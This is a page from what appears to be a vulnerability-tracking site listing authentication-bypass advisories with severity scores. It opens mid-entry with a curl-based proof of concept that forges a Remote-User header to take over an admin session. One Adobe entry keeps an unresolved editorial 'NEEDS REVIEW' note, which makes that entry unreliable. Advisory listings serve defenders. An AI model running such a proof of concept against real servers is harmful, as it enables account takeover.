(DISCREET_LOGIN) { return response.sendStatus(204); } const users = await storage.values(x => x.key.startsWith(KEY_PREFIX)); return response.json(viewModels); // returns handle, name, avatar, admin, password flags }); ``` This allows an attacker to enumerate all user handles (including admin handles) without any prior credentials. ## PoC ```bash TARGET="http://localhost:8000" # enumerate users curl -s -X POST "$TARGET/api/users/list" -H "Content-Type: application/json" -d '{}' # inject Remote-User header, receive authsession curl -s -L \ -H "Remote-User: admin-user" \ -c /tmp/st-session.txt \ "$TARGET/login" # obtain CSRF token, call admin API TOKEN=$(curl -s -b /tmp/st-session.txt "$TARGET/csrf-token" | python3 -c "import sys,json; print(json.load(sys.stdin)['token'])") curl -s -X POST "$TARGET/api/users/admin/get" \ -H "Content-Type: application/json" \ -H "X-CSRF-Token: $TOKEN" \ -b /tmp/st-session.txt \ -d '{}' ``` --- ## Impact An account takeover, allowing an attacker to do anything a legitimately authorized user can do.

Authentication Bypass CSRF
NVD GitHub
EPSS 0% CVSS 7.5
HIGH PATCH This Week

arduino-esp32 is an Arduino core for the ESP32, ESP32-S2, ESP32-S3, ESP32-C3, ESP32-C6 and ESP32-H2 microcontrollers. Prior to 3.3.8, the WebServer Digest authentication implementation in arduino-esp32 computes the authentication hash using the URI field from the client's Authorization header, without verifying that it matches the actual requested URI. This allows an attacker who possesses any valid digest response (computed for URI-A) to authenticate requests to a completely different protected URI (URI-B), bypassing per-resource access control. This vulnerability is fixed in 3.3.8.

Authentication Bypass Arduino Esp32
NVD GitHub
EPSS 0% CVSS 8.7
HIGH PATCH This Week

Heym before 0.0.21 contains a sandbox escape vulnerability in the custom Python tool executor that allows authenticated workflow authors to bypass sandbox restrictions by using object-graph introspection primitives. Attackers can use Python introspection techniques to recover the unrestricted __import__ function, import blocked modules such as os and subprocess, and access inherited backend environment variables containing database credentials and encryption keys to execute arbitrary host commands as the backend service user.

Authentication Bypass Python Heym
NVD GitHub
EPSS 0% CVSS 7.6
HIGH PATCH This Week

Heym before 0.0.21 contains an authorization bypass vulnerability in workflow execution that allows authenticated users to execute arbitrary workflows by referencing victim workflow UUIDs without proper access validation. Attackers can create workflows with execute nodes or agent subWorkflowIds pointing to victim workflow UUIDs to load and execute those workflows under attacker-controlled execution paths, exposing victim workflow outputs and triggering workflow nodes with unintended side effects.

Authentication Bypass Heym
NVD GitHub
EPSS 0% CVSS 8.1
HIGH PATCH This Week

efw4.X is an Enterprise Framework for Web. Prior to 4.08.010, the readonly flag set on the <efw:elFinder> JSP tag is intended to prevent file modifications. When protected=true, elfinder_checkRisk enforces that the client sends readonly=true (matching the session value), but no event handler checks the readonly value before performing write operations. The flag only controls client-side UI elements (disabling buttons) and response metadata (write: 0, locked: 1). An attacker who sends requests directly (bypassing the UI) can perform all file operations despite readonly=true. This vulnerability is fixed in 4.08.010.

Authentication Bypass Efw4 X
NVD GitHub
EPSS 0% CVSS 8.4
HIGH Act Now

PowerSYSTEM Center REST API endpoint for device account export allows an authenticated user with limited permissions to expose sensitive information normally restricted to administrative permissions only.

Authentication Bypass Powersystem Center 2020 Powersystem Center 2024 +1
NVD GitHub
EPSS 0% CVSS 6.9
MEDIUM This Month

PowerSYSTEM Center REST API endpoint for devices allows a low privilege authenticated user to access information normally limited by operational permissions.

Authentication Bypass Powersystem Center 2020
NVD GitHub
EPSS 0% CVSS 7.0
HIGH Act Now

PowerSYSTEM Center feature for device project groups allows an authenticated user with limited permissions to perform an unauthorized deletion of project groups.

Authentication Bypass Powersystem Center 2024 Powersystem Center 2026
NVD GitHub
EPSS 0% CVSS 4.3
MEDIUM This Month

Adobe Commerce versions 2.4.9-beta1, 2.4.8-p4, 2.4.7-p9, 2.4.6-p14, 2.4.5-p16, 2.4.4-p17 and earlier are affected by an Improper Authorization vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized write access. Exploitation of this issue requires user interaction in that a victim must visit a maliciously crafted URL or interact with a compromised web page.

Authentication Bypass Adobe
NVD
EPSS 0% CVSS 3.4
LOW Monitor

Adobe Commerce versions 2.4.9-beta1, 2.4.8-p4, 2.4.7-p9, 2.4.6-p14, 2.4.5-p16, 2.4.4-p17 and earlier [NEEDS REVIEW: impact mismatch - ticket says 'Arbitrary file system write', CIA triad derives 'Security Feature Bypass'. Verify CVSS vector before publishing.] are affected by an Improper Input Validation vulnerability that could result in a Security feature bypass. A high-privileged attacker could leverage this vulnerability to bypass security measures and gain unauthorized write access. Exploitation of this issue requires user interaction in that a victim must visit a maliciously crafted URL or interact with a compromised web page. Scope is changed.

Authentication Bypass Adobe Adobe Commerce
NVD VulDB
EPSS 0% CVSS 7.5
HIGH This Week

Adobe Commerce versions 2.4.9-beta1, 2.4.8-p4, 2.4.7-p9, 2.4.6-p14, 2.4.5-p16, 2.4.4-p17 and earlier are affected by an Incorrect Authorization vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized write access. Exploitation of this issue does not require user interaction.

Authentication Bypass Adobe
NVD
EPSS 0% CVSS 7.5
HIGH This Week

Adobe Commerce versions 2.4.9-beta1, 2.4.8-p4, 2.4.7-p9, 2.4.6-p14, 2.4.5-p16, 2.4.4-p17 and earlier are affected by an Incorrect Authorization vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized write access. Exploitation of this issue does not require user interaction.

Authentication Bypass Adobe
NVD
EPSS 0% CVSS 9.1
CRITICAL PATCH Act Now

Relay adds real-time collaboration to Obsidian. Relay Server versions 0.9.0 through 0.9.6 contain an authentication bypass in the multi-document WebSocket endpoints. When authentication is configured, WebSocket connections without a token query parameter were incorrectly treated as having full server permissions. An unauthenticated network attacker who knows or guesses a document ID could connect to the document sync WebSocket and read or modify document contents without a valid document token. This vulnerability is fixed in 0.9.7.

Authentication Bypass Relay Server
NVD GitHub
EPSS 0% CVSS 5.4
MEDIUM This Month

A session management vulnerability in AOS-8 allows previously authenticated users to retain network access after their accounts are administratively disabled. Existing sessions are not invalidated when credentials are revoked, enabling continued access until session expiration. An attacker with compromised credentials could exploit this behavior to maintain unauthorized access even after the account has been disabled.

Authentication Bypass Hpe Aruba Networking Wireless Operating System Aos
NVD
EPSS 0% CVSS 4.9
MEDIUM This Month

A vulnerability exists in the web-based management interface of an AOS-10 Gateway that could allow an authenticated remote attacker to access sensitive files on the underlying operating system. Successful exploitation of this vulnerability could result in the disclosure of confidential system information, potentially enabling further attacks against the affected device.

Authentication Bypass Hpe Aruba Networking Wireless Operating System Aos
NVD
EPSS 0% CVSS 9.3
CRITICAL Act Now

Adobe Connect versions 2025.9.15, 2025.8.157 and earlier are affected by an Incorrect Authorization vulnerability that could result in arbitrary code execution in the context of the current user. An attacker could exploit this vulnerability to inject malicious scripts into a web page, potentially gaining elevated access or control over the victim's account or session. Exploitation of this issue requires user interaction in that a victim must visit a maliciously crafted URL or interact with a compromised web page. Scope is changed.

Authentication Bypass Adobe RCE
NVD
EPSS 0% CVSS 4.3
MEDIUM This Month

Unauthenticated attackers can modify or delete arbitrary user notification records in Devolutions Server due to missing session validation in notification management endpoints. The vulnerability affects Devolutions Server 2025.3.19.0 and earlier, plus versions 2026.1.6.0 through 2026.1.15.0. CVSS 4.3 indicates low-to-moderate risk, but the EPSS percentile of 4% suggests this is not a high-priority target for automated exploitation despite the authentication bypass tag.

Authentication Bypass Devolutions Server
NVD VulDB
EPSS 0% CVSS 9.1
CRITICAL PATCH Act Now

Pingvin Share X is a secure and easy self-hosted file sharing platform. From 1.14.1 to 1.16.2, a critical authentication bypass vulnerability allows an attacker who has obtained a valid username and password to skip the second-factor authentication (TOTP) requirement entirely. Although, an attacker still needs the user's password to reach this stage. This vulnerability is fixed in 1.16.3.

Authentication Bypass
NVD GitHub
EPSS 0% CVSS 9.8
CRITICAL PATCH Act Now

Cleanuparr is a tool for automating the cleanup of unwanted or blocked files in Sonarr, Radarr, and supported download clients like qBittorrent. Prior to 2.9.10, TrustedNetworkAuthenticationHandler.ResolveClientIp parses the leftmost entry of the X-Forwarded-For header as the client IP. That entry is attacker-controlled - X-Forwarded-For is append-only, so the leftmost value is whatever the original HTTP client claimed. By sending a spoofed local IP in the header, an unauthenticated remote attacker passes the trusted-network check and is logged in as the Cleanuparr administrator. This vulnerability is fixed in 2.9.10.

Authentication Bypass
NVD GitHub
EPSS 0% CVSS 5.3
MEDIUM This Month

mem0 1.0.0 server accepts unauthenticated POST requests to the /memories endpoint, allowing remote attackers to inject arbitrary memory records without identity verification or authorization checks. This authentication bypass enables data pollution and unauthorized modification of the memory database with spoofed entries. EPSS exploitation probability is low (0.05th percentile), and no active exploitation has been confirmed, but the vulnerability is automatable and affects default configurations.

Authentication Bypass Mem0
NVD GitHub
EPSS 0% CVSS 6.5
MEDIUM This Month

Unauthenticated deletion of arbitrary memory records in mem0 1.0.0 allows remote attackers to remove any database entry without credentials, causing unauthorized data loss and potential denial of service. The DELETE /memories/{memory_id} endpoint completely lacks authentication and authorization controls, exposing all memory records to deletion by any network-accessible attacker. No public exploit code has been identified, but the vulnerability is trivial to exploit given the straightforward API design.

Authentication Bypass Denial Of Service Mem0
NVD GitHub
EPSS 0% CVSS 6.5
MEDIUM This Month

mem0 1.0.0 server allows unauthenticated remote attackers to trigger memory reset and table re-creation via unprotected DELETE /memories endpoint, causing schema disruption, data loss, and denial of service. The vulnerability exploits missing authentication and authorization controls on a database management operation accessible over the network without credentials.

Authentication Bypass Denial Of Service Mem0
NVD GitHub
EPSS 0% CVSS 9.1
CRITICAL PATCH Act Now

Insufficient ownership checks in `clientarea.php` allow an authenticated client area user to submit requests using another user’s `addonId` without any ownership validation leading to unauthorized access to the victim's resources and their cPanel account.

Authentication Bypass PHP
NVD
EPSS 0% CVSS 8.8
HIGH PATCH This Week

An access issue was addressed with additional sandbox restrictions. This issue is fixed in macOS Sequoia 15.7.7, macOS Sonoma 14.8.7, macOS Tahoe 26.2. An app may be able to break out of its sandbox.

Authentication Bypass Apple
NVD
EPSS 0% CVSS 5.3
MEDIUM PATCH This Month

linux-entra-sso is a browser plugin for Linux to SSO on Microsoft Entra ID. Prior to 1.8.1, platform/chrome/js/platform-chrome.js:69-88 registers a single declarativeNetRequest rule whose urlFilter is Platform.SSO_URL + "/*", i.e. "https://login.microsoftonline.com/*". Chrome's urlFilter without a | or || anchor is substring-matched against the full request URL. The same applied rule action is modifyHeaders that attaches the Entra ID Primary Refresh Token cookie. The Firefox adapter in platform/firefox/js/platform-firefox.js:53 performs a belt-and-braces startsWith(Platform.SSO_URL) check before injecting the header; the Chrome adapter does not. When the extension holds broad host permissions through the optional_host_permissions: ["https://*/*"] declared in platform/chrome/manifest.json:34, a main-frame navigation to a URL whose path embeds https://login.microsoftonline.com/ causes Chrome to attach the PRT cookie to the request to the attacker-controlled host. This vulnerability is fixed in 1.8.1.

Authentication Bypass Mozilla Microsoft +2
NVD GitHub
EPSS 0% CVSS 5.4
MEDIUM PATCH Exploit Unlikely This Month

Improper neutralization of special elements in output used by a downstream component ('injection') in Microsoft Edge (Chromium-based) allows an unauthorized attacker to elevate privileges over a network.

Authentication Bypass Microsoft Google
NVD VulDB
EPSS 0% CVSS 4.3
MEDIUM PATCH This Month

User interface (ui) misrepresentation of critical information in Microsoft Edge (Chromium-based) allows an unauthorized attacker to perform spoofing over a network.

Authentication Bypass Microsoft Google
NVD VulDB
EPSS 0% CVSS 7.7
HIGH PATCH This Week

Improper access control in Microsoft Office allows an unauthorized attacker to perform spoofing locally.

Authentication Bypass Microsoft
NVD VulDB
EPSS 0% CVSS 9.9
CRITICAL PATCH Exploit Unlikely Act Now

Improper access control in Azure Logic Apps allows an authorized attacker to elevate privileges over a network.

Authentication Bypass Microsoft
NVD VulDB
EPSS 0% CVSS 8.8
HIGH PATCH Exploit Unlikely This Week

Session fixation in Visual Studio Code allows an unauthorized attacker to elevate privileges over a network.

Authentication Bypass Session Fixation
NVD VulDB
EPSS 0% CVSS 9.1
CRITICAL PATCH Exploit Likely Act Now

Incorrect implementation of authentication algorithm in Microsoft SSO Plugin for Jira &amp; Confluence allows an unauthorized attacker to elevate privileges over a network.

Authentication Bypass Microsoft Atlassian
NVD VulDB
EPSS 0% CVSS 7.8
HIGH PATCH Exploit Unlikely This Week

Improper access control in Azure Connected Machine Agent allows an authorized attacker to elevate privileges locally.

Authentication Bypass Microsoft
NVD VulDB
EPSS 0% CVSS 6.7
MEDIUM PATCH Exploit Unlikely This Month

Reliance on a component that is not updateable in Windows Secure Boot allows an authorized attacker to bypass a security feature locally.

Authentication Bypass Microsoft
NVD VulDB
EPSS 0% CVSS 8.8
HIGH PATCH Exploit Unlikely This Week

Improper access control in Windows Admin Center allows an authorized attacker to elevate privileges over a network.

Authentication Bypass Microsoft
NVD VulDB
EPSS 0% CVSS 8.8
HIGH PATCH Exploit Unlikely This Week

Improper access control in Microsoft Office Click-To-Run allows an authorized attacker to elevate privileges locally.

Authentication Bypass Microsoft
NVD VulDB
EPSS 0% CVSS 4.4
MEDIUM PATCH This Month

Improper access control in Windows Filtering Platform (WFP) allows an authorized attacker to bypass a security feature locally.

Authentication Bypass Microsoft
NVD VulDB
EPSS 0% CVSS 8.4
HIGH PATCH This Week

Untrusted pointer dereference in Microsoft Office Word allows an unauthorized attacker to execute code locally.

Authentication Bypass Microsoft
NVD VulDB
EPSS 0% CVSS 8.2
HIGH PATCH Exploit Unlikely This Week

Improper neutralization of special elements in output used by a downstream component ('injection') in Azure Machine Learning allows an unauthorized attacker to perform spoofing over a network.

Authentication Bypass Microsoft Azure Machine Learning
NVD VulDB
EPSS 0% CVSS 4.3
MEDIUM PATCH This Month

User interface (ui) misrepresentation of critical information in Microsoft Edge for Android allows an unauthorized attacker to perform spoofing over a network.

Authentication Bypass Microsoft Google
NVD VulDB
EPSS 0% CVSS 6.5
MEDIUM PATCH This Month

User interface (ui) misrepresentation of critical information in Microsoft Edge (Chromium-based) allows an unauthorized attacker to perform spoofing over a network.

Authentication Bypass Microsoft Google
NVD VulDB
EPSS 0% CVSS 7.5
HIGH PATCH Exploit Unlikely This Week

Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Native WiFi Miniport Driver allows an unauthorized attacker to execute code over an adjacent network.

Authentication Bypass Microsoft Race Condition
NVD VulDB
EPSS 0% CVSS 6.2
MEDIUM PATCH Exploit Unlikely This Month

Improper access control in M365 Copilot for Desktop allows an unauthorized attacker to perform spoofing locally.

Authentication Bypass M365 Copilot For Desktop
NVD VulDB
EPSS 0% CVSS 8.8
HIGH PATCH Exploit Unlikely This Week

Improper neutralization of special elements in output used by a downstream component ('injection') in GitHub Copilot and Visual Studio allows an unauthorized attacker to bypass a security feature over a network.

Authentication Bypass Visual Studio Code
NVD VulDB
EPSS 0% CVSS 7.1
HIGH PATCH This Week

Improper access control in Microsoft Office PowerPoint allows an authorized attacker to perform spoofing locally.

Authentication Bypass Microsoft
NVD VulDB
EPSS 0% CVSS 7.1
HIGH PATCH This Week

Improper access control in Microsoft Office Word allows an authorized attacker to perform spoofing locally.

Authentication Bypass Microsoft
NVD VulDB
EPSS 0% CVSS 4.4
MEDIUM PATCH This Month

Improper access control in M365 Copilot allows an authorized attacker to perform spoofing locally.

Authentication Bypass Microsoft 365 Copilot For Android
NVD VulDB
EPSS 0% CVSS 8.4
HIGH PATCH Exploit Likely This Week

Access of resource using incompatible type ('type confusion') in Microsoft Office Word allows an unauthorized attacker to execute code locally.

Authentication Bypass Microsoft Memory Corruption
NVD VulDB
EPSS 0% CVSS 8.3
HIGH PATCH Exploit Unlikely This Week

Missing authorization in Windows Admin Center allows an authorized attacker to elevate privileges over a network.

Authentication Bypass Microsoft
NVD VulDB
EPSS 0% CVSS 7.3
HIGH POC PATCH This Week

Improper input validation in .NET allows an unauthorized attacker to elevate privileges locally.

Authentication Bypass Net 10 0 Net 8 0 +1
NVD VulDB GitHub
EPSS 0% CVSS 7.5
HIGH PATCH This Week

Missing release of memory after effective lifetime in Windows Internet Key Exchange (IKE) Protocol allows an unauthorized attacker to deny service over a network.

Authentication Bypass Microsoft
NVD VulDB
EPSS 0% CVSS 6.5
MEDIUM PATCH This Month

Authentication bypass using an alternate path or channel in Windows TCP/IP allows an authorized attacker to bypass a security feature over a network.

Authentication Bypass Microsoft
NVD VulDB
EPSS 0% CVSS 7.8
HIGH PATCH Exploit Unlikely This Week

Windows Event Logging Service privilege escalation allows local authenticated attackers with low-level privileges to gain SYSTEM-level control across Windows 10, Windows 11, and Windows Server 2012+ environments. The vulnerability requires no user interaction and has low attack complexity (AC:L), making exploitation straightforward once initial access is obtained. Microsoft has released patches via their March 2026 security updates, and exploitation requires only standard user credentials on vulnerable systems. CVSS 7.8 HIGH severity with complete compromise of confidentiality, integrity, and availability upon successful exploitation.

Authentication Bypass Microsoft
NVD VulDB
Prev Page 38 of 348 Next

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy